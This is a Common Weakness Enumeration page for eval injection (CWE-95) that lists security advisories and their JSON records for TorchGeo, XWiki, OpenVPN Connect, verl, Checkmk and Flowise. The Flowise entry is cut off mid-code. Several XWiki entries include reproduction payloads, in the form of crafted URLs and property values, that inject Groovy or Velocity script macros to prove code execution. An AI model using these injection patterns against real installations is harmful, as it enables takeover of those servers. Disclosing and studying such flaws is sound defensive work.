Common Weakness Enumeration

CWE-95

Allowed

Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").

262 vulnerabilities reference this CWE, most recent first.

GHSA-GHQ9-VC6F-8QJF

Vulnerability from github – Published: 2026-04-01 00:03 – Updated: 2026-04-01 00:03
VLAI
Summary
TorchGeo Remote Code Execution Vulnerability
Details

Impact

TorchGeo 0.4–0.6.0 used an eval statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose torchgeo.models.get_weight() or torchgeo.trainers as an external API could be affected.

Patches

The eval statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.

Workarounds

In unpatched versions, input validation and sanitization can be used to avoid this vulnerability.

References

Bug history

  • Introduced: https://github.com/torchgeo/torchgeo/pull/917
  • Patched: https://github.com/torchgeo/torchgeo/pull/2323
  • Released: v0.6.1
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.6.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "torchgeo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.4"
            },
            {
              "fixed": "0.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-49048"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T00:03:56Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\n\nTorchGeo 0.4\u20130.6.0 used an [`eval`](https://docs.python.org/3/library/functions.html#eval) statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose [`torchgeo.models.get_weight()`](https://torchgeo.readthedocs.io/en/v0.6.0/api/models.html#torchgeo.models.get_weight) or [`torchgeo.trainers`](https://torchgeo.readthedocs.io/en/v0.6.0/api/trainers.html) as an external API could be affected.\n\n### Patches\n\nThe `eval` statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.\n\n### Workarounds\n\nIn unpatched versions, input validation and sanitization can be used to avoid this vulnerability.\n\n### References\n\n#### Bug history\n\n* Introduced: https://github.com/torchgeo/torchgeo/pull/917\n* Patched: https://github.com/torchgeo/torchgeo/pull/2323\n* Released: [v0.6.1](https://github.com/microsoft/torchgeo/releases/tag/v0.6.1)",
  "id": "GHSA-ghq9-vc6f-8qjf",
  "modified": "2026-04-01T00:03:56Z",
  "published": "2026-04-01T00:03:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/torchgeo/torchgeo/security/advisories/GHSA-ghq9-vc6f-8qjf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49048"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torchgeo/torchgeo/pull/2323"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torchgeo/torchgeo/pull/917"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torchgeo/torchgeo/commit/1a980788cb7089a1115f3b786c7daa9dd47d7d7a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/microsoft/torchgeo/releases/tag/v0.6.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/torchgeo/PYSEC-2024-204.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/torchgeo/torchgeo"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49048"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "TorchGeo Remote Code Execution Vulnerability"
}

GHSA-GWJ6-XPFG-PXWR

Vulnerability from github – Published: 2025-09-08 20:59 – Updated: 2025-09-10 21:05
VLAI
Summary
XWiki Blog Application: Privilege Escalation (PR) from account through blog content
Details

Impact

The blog application in XWiki allowed remote code execution for any user who has edit right on any page. Normally, these are all logged-in users as they can edit their own user profile. To exploit, it is sufficient to add an object of type Blog.BlogPostClass to any page and to add some script macro with the exploit code to the "Content" field of that object.

Patches

The vulnerability has been patched in the blog application version 9.14 by executing the content of blog posts with the rights of the appropriate author.

Workarounds

We're not aware of any workarounds.

Resources

  • https://jira.xwiki.org/browse/BLOG-191
  • https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.contrib.blog:application-blog-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58365"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-250",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-08T20:59:47Z",
    "nvd_published_at": "2025-09-08T22:15:34Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nThe blog application in XWiki allowed remote code execution for any user who has edit right on any page. Normally, these are all logged-in users as they can edit their own user profile. To exploit, it is sufficient to add an object of type `Blog.BlogPostClass` to any page and to add some script macro with the exploit code to the \"Content\" field of that object.\n\n### Patches\nThe vulnerability has been patched in the blog application version 9.14 by executing the content of blog posts with the rights of the appropriate author.\n\n### Workarounds\nWe\u0027re not aware of any workarounds.\n\n### Resources\n* https://jira.xwiki.org/browse/BLOG-191\n* https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4",
  "id": "GHSA-gwj6-xpfg-pxwr",
  "modified": "2025-09-10T21:05:21Z",
  "published": "2025-09-08T20:59:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki-contrib/application-blog/security/advisories/GHSA-gwj6-xpfg-pxwr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58365"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki-contrib/application-blog"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/BLOG-191"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "XWiki Blog Application: Privilege Escalation (PR) from account through blog content"
}

GHSA-H25W-QH4W-J2HF

Vulnerability from github – Published: 2024-01-08 15:30 – Updated: 2024-09-04 21:30
VLAI
Details

OpenVPN Connect version 3.0 through 3.4.6 on macOS allows local users to execute code in external third party libraries using the DYLD_INSERT_LIBRARIES environment variable

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-7224"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-08T14:15:47Z",
    "severity": "HIGH"
  },
  "details": "OpenVPN Connect version 3.0 through 3.4.6 on macOS allows local users to execute code in external third party libraries using the DYLD_INSERT_LIBRARIES environment variable",
  "id": "GHSA-h25w-qh4w-j2hf",
  "modified": "2024-09-04T21:30:30Z",
  "published": "2024-01-08T15:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7224"
    },
    {
      "type": "WEB",
      "url": "https://openvpn.net/vpn-server-resources/openvpn-connect-for-macos-change-log"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H4VP-69R8-GVJG

Vulnerability from github – Published: 2023-07-14 21:53 – Updated: 2023-07-14 21:53
VLAI
Summary
org.xwiki.platform:xwiki-platform-skin-ui Eval Injection vulnerability
Details

Impact

Improper escaping in the document SkinsCode.XWikiSkinsSheet leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents.

The attack works by opening a non-existing page with a name crafted to contain a dangerous payload.

It is possible to check if an existing installation is vulnerable by opening <xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view where <xwiki-host is the URL of the XWiki installation. The expected result are two list items with "Edit this skin" and "Test this skin" without any further text. If the installation is vulnerable, the second list item is "Test this skin Hello from groovy!.WebHome"]]". This shows that the Groovy macro has been executed.

Patches

This has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1.

Workarounds

The fix can also be applied manually to the impacted document SkinsCode.XWikiSkinsSheet.

References

  • https://jira.xwiki.org/browse/XWIKI-20457
  • https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-skin-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0-rc-1"
            },
            {
              "fixed": "14.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-skin-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "14.5"
            },
            {
              "fixed": "14.10.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-37462"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-14T21:53:52Z",
    "nvd_published_at": "2023-07-14T21:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nImproper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents.\n\nThe attack works by opening a non-existing page with a name crafted to contain a dangerous payload.\n\nIt is possible to check if an existing installation is vulnerable by opening `\u003cxwiki-host\u003e/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet\u0026xpage=view` where \u003cxwiki-host is the URL of the XWiki installation. The expected result are two list items with \"Edit this skin\" and \"Test this skin\" without any further text. If the installation is vulnerable, the second list item is \"Test this skin Hello from groovy!.WebHome\"]]\". This shows that the Groovy macro has been executed.\n\n### Patches\n\nThis has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1.\n\n### Workarounds\n\nThe [fix](https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29) can also be applied manually to the impacted document `SkinsCode.XWikiSkinsSheet`.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20457\n* https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
  "id": "GHSA-h4vp-69r8-gvjg",
  "modified": "2023-07-14T21:53:52Z",
  "published": "2023-07-14T21:53:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37462"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20457"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "org.xwiki.platform:xwiki-platform-skin-ui Eval Injection vulnerability"
}

GHSA-H57C-V2V3-5V3V

Vulnerability from github – Published: 2026-04-23 00:31 – Updated: 2026-04-30 20:52
VLAI
Summary
verl's math_equal() Vulnerable to Arbitrary Code Execution via Unsafe eval()
Details

A vulnerability was identified in ByteDance verl up to 0.7.1. Affected is the function math_equal of the file prime_math/grader.py. The manipulation leads to a sandbox issue. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit is publicly available and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "verl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-6878"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-30T20:52:35Z",
    "nvd_published_at": "2026-04-23T00:16:47Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was identified in ByteDance verl up to 0.7.1. Affected is the function math_equal of the file prime_math/grader.py. The manipulation leads to a sandbox issue. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit is publicly available and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-h57c-v2v3-5v3v",
  "modified": "2026-04-30T20:52:35Z",
  "published": "2026-04-23T00:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6878"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/verl-project/verl"
    },
    {
      "type": "WEB",
      "url": "https://github.com/verl-project/verl/blob/v0.7.1/verl/utils/reward_score/prime_math/grader.py"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zast-ai/vulnerability-reports/blob/main/bytedance/verl_rce.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/795257"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/359040"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/359040/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "verl\u0027s math_equal() Vulnerable to Arbitrary Code Execution via Unsafe eval()"
}

GHSA-H63H-5C77-77P5

Vulnerability from github – Published: 2024-07-31 15:24 – Updated: 2024-09-06 21:41
VLAI
Summary
XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet
Details

Impact

Any user with edit right on any page can perform arbitrary remote code execution by adding instances of XWiki.SearchSuggestConfig and XWiki.SearchSuggestSourceClass to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce on an instance, as a user without script nor programming rights, add an object of type XWiki.SearchSuggestConfig to your profile page, and an object of type XWiki.SearchSuggestSourceClass as well. On this last object, set both name and icon properties to $services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')") and limit and engine to {{/html}}{{async}}{{velocity}}$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')"){{/velocity}}{{/async}}. Save and display the page. If the logs contain any message ERROR attacker - I got programming: true then the instance is vulnerable.

Patches

This vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.

Workarounds

We're not aware of any workaround except upgrading.

References

  • https://jira.xwiki.org/browse/XWIKI-21473
  • https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-search-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.2-rc-1"
            },
            {
              "fixed": "14.10.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-search-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0-rc-1"
            },
            {
              "fixed": "15.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-search-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.6-rc-1"
            },
            {
              "fixed": "15.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-37901"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-31T15:24:37Z",
    "nvd_published_at": "2024-07-31T16:15:03Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nAny user with edit right on any page can perform arbitrary remote code execution by adding instances of `XWiki.SearchSuggestConfig` and `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.\n\nTo reproduce on an instance, as a user without script nor programming rights, add an object of type `XWiki.SearchSuggestConfig` to your profile page, and an object of type `XWiki.SearchSuggestSourceClass` as well. On this last object, set both `name` and `icon` properties to `$services.logging.getLogger(\"attacker\").error(\"I got programming: $services.security.authorization.hasAccess(\u0027programming\u0027)\")` and `limit` and `engine` to `{{/html}}{{async}}{{velocity}}$services.logging.getLogger(\"attacker\").error(\"I got programming: $services.security.authorization.hasAccess(\u0027programming\u0027)\"){{/velocity}}{{/async}}`. Save and display the page. If the logs contain any message `ERROR attacker - I got programming: true` then the instance is vulnerable.\n\n### Patches\nThis vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.\n\n### Workarounds\nWe\u0027re not aware of any workaround except upgrading.\n\n### References\n- https://jira.xwiki.org/browse/XWIKI-21473\n- https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e",
  "id": "GHSA-h63h-5c77-77p5",
  "modified": "2024-09-06T21:41:22Z",
  "published": "2024-07-31T15:24:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h63h-5c77-77p5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37901"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/0b135760514fef73db748986a3311f3edd4a553b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/9ce3e0319869b6d8131fc4e0909736f7041566a4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/bbde8a4f564e3c28839440076334a9093e2b4834"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-21473"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet"
}

GHSA-HF43-47Q4-FHQ5

Vulnerability from github – Published: 2024-04-10 17:16 – Updated: 2024-04-10 22:01
VLAI
Summary
XWiki Commons missing escaping of `{` in Velocity escapetool allows remote code execution
Details

Impact

The HTML escaping of escaping tool that is used in XWiki doesn't escape {, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.

To reproduce in an XWiki installation, open <xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27) where <xwiki-host> is the URL of your XWiki installation. If this displays You are not admin on this place Hello from URL Parameter! I got programming: true, the installation is vulnerable.

Patches

The vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.

Workarounds

Apart from upgrading, there is no generic workaround. However, replacing $escapetool.html by $escapetool.xml in XWiki documents fixes the vulnerability. In a standard XWiki installation, we're only aware of the document Panels.PanelLayoutUpdate that exposes this vulnerability, patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.

References

  • https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a
  • https://jira.xwiki.org/browse/XCOMMONS-2828
  • https://jira.xwiki.org/browse/XWIKI-21438
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.commons:xwiki-commons-velocity"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.1"
            },
            {
              "fixed": "14.10.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.commons:xwiki-commons-velocity"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0-rc-1"
            },
            {
              "fixed": "15.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.commons:xwiki-commons-velocity"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.6-rc-1"
            },
            {
              "fixed": "15.9-rc-1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-31996"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-10T17:16:37Z",
    "nvd_published_at": "2024-04-10T21:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nThe HTML escaping of escaping tool that is used in XWiki doesn\u0027t escape `{`, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.\n\nTo reproduce in an XWiki installation, open `\u003cxwiki-host\u003e/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D\u0026eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27)` where `\u003cxwiki-host\u003e` is the URL of your XWiki installation. If this displays `You are not admin on this place Hello from URL Parameter! I got programming: true`, the installation is vulnerable.\n\n### Patches\nThe vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.\n\n### Workarounds\nApart from upgrading, there is no generic workaround. However, replacing `$escapetool.html` by `$escapetool.xml` in XWiki documents fixes the vulnerability. In a standard XWiki installation, we\u0027re only aware of the document `Panels.PanelLayoutUpdate` that exposes this vulnerability, patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.\n\n### References\n- https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a\n- https://jira.xwiki.org/browse/XCOMMONS-2828\n- https://jira.xwiki.org/browse/XWIKI-21438",
  "id": "GHSA-hf43-47q4-fhq5",
  "modified": "2024-04-10T22:01:56Z",
  "published": "2024-04-10T17:16:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-hf43-47q4-fhq5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31996"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-commons/commit/b0805160ec7b01ee12417e79cb384e60ae4817aa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-commons/commit/ed7ff515a2436a1c6dcbd0c6ca0c41e434d58915"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-commons"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XCOMMONS-2828"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-21438"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XWiki Commons missing escaping of `{` in Velocity escapetool allows remote code execution"
}

GHSA-HGR6-FXR2-JX3F

Vulnerability from github – Published: 2024-01-12 09:30 – Updated: 2024-01-12 09:30
VLAI
Details

Privilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p17, 2.1.0p37 and 2.0.0p39 allows local user to escalate privileges

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-6735"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-269",
      "CWE-95"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-12T08:15:43Z",
    "severity": "HIGH"
  },
  "details": "Privilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p17, 2.1.0p37 and 2.0.0p39 allows local user to escalate privileges",
  "id": "GHSA-hgr6-fxr2-jx3f",
  "modified": "2024-01-12T09:30:29Z",
  "published": "2024-01-12T09:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6735"
    },
    {
      "type": "WEB",
      "url": "https://checkmk.com/werk/16273"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HMGH-466J-FX4C

Vulnerability from github – Published: 2025-10-06 14:08 – Updated: 2025-10-06 14:08
VLAI
Summary
Flowise vulnerable to RCE via Dynamic function constructor injection
Details

Summary

User-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE.

Details

When creating a new Custom MCP Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:

{
    "command": "npx",
    "args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/allowed/files"]
}

Behind the scene, a POST request to /api/v1/node-load-method/customMCP is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):

{
...SNIP...

   "inputs":{
      "mcpServerConfig":{
         "command":"npx",
         "args":[
            "-y",
            "@modelcontextprotocol/server-filesystem",
            "/path/to/allowed/files"
         ]
      }
   },
   "loadMethod":"listActions"

...SNIP...
}

Sending the same request with the parameter mcpServerConfig equals to a plain value and not an object, for example:

{
   "inputs":{
      "mcpServerConfig":"test"
   },
   "loadMethod":"listActions"
}

We enter an interesting code flow that leads to a function named convertValidJSONString (Line 103): https://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103

async getTools(nodeData: INodeData): Promise<Tool[]> {
        const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string

        if (!mcpServerConfig) {
            throw new Error('MCP Server Config is required')
        }

        try {
            let serverParams
            if (typeof mcpServerConfig === 'object') {
                serverParams = mcpServerConfig
            } else if (typeof mcpServerConfig === 'string') {
                const serverParamsString = convertToValidJSONString(mcpServerConfig) <--
                serverParams = JSON.parse(serverParamsString)
            }

            const toolkit = new MCPToolkit(serverParams, 'stdio')
            await toolkit.initialize()

            const tools = toolkit.tools ?? []

